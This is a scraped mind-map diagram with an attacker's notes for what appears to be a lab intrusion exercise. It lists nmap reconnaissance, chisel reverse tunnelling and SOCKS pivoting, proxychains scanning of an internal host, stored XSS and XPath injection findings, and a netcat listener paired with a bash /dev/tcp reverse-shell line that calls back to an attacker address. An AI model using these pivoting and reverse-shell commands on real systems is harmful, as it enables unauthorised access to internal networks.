Please enable JavaScript.
Coggle requires JavaScript to display documents.
Attacker, chisel windows R - Coggle Diagram
Attacker
step stool
.\chisel.exe client 192.168.2.10:8000 R:8000:172.16.0.20:80
.\chisel.exe client 192.168.2.10:8000 R:9999:localhost:4444
.\chisel client 192.168.2.10:8000 R:socks
Reconnaissance
Port Scanning
nmap
nmap -A xxx.xxx.xxx.xxx
Public Website
Ports in use
Port 80
Port 22
Services in Use
HTTP
SSH
Internal Management WebSite
Services in Use
HTTP
SSH
Ports in use
Port 80
Port 22
Public Web search
XSS-Stored
ReverseShell
Vulnerability
XSS-Stored(Public Website)
XPATH Injection(Internal Management WebSite
Attacker
.\chisel server -p 8000 --reverse
proxychains4 nmap -sT -Pn 172.16.0.20
Port 80 is found
.\chisel.exe client 192.168.2.10:8000 R:9999:172.16.0.20:80
http://localhost:9999
Internal Management WebSearch
Reverse Shell via Web Shell Deployment Using XPath Injection
nc -lvnp 4444
bash -i >& /dev/tcp192.168.2.10/4444 0>&1
Shell a Get
Weaponization
Tools
SSH
nmap
proxychains4
chisel
chisel windows R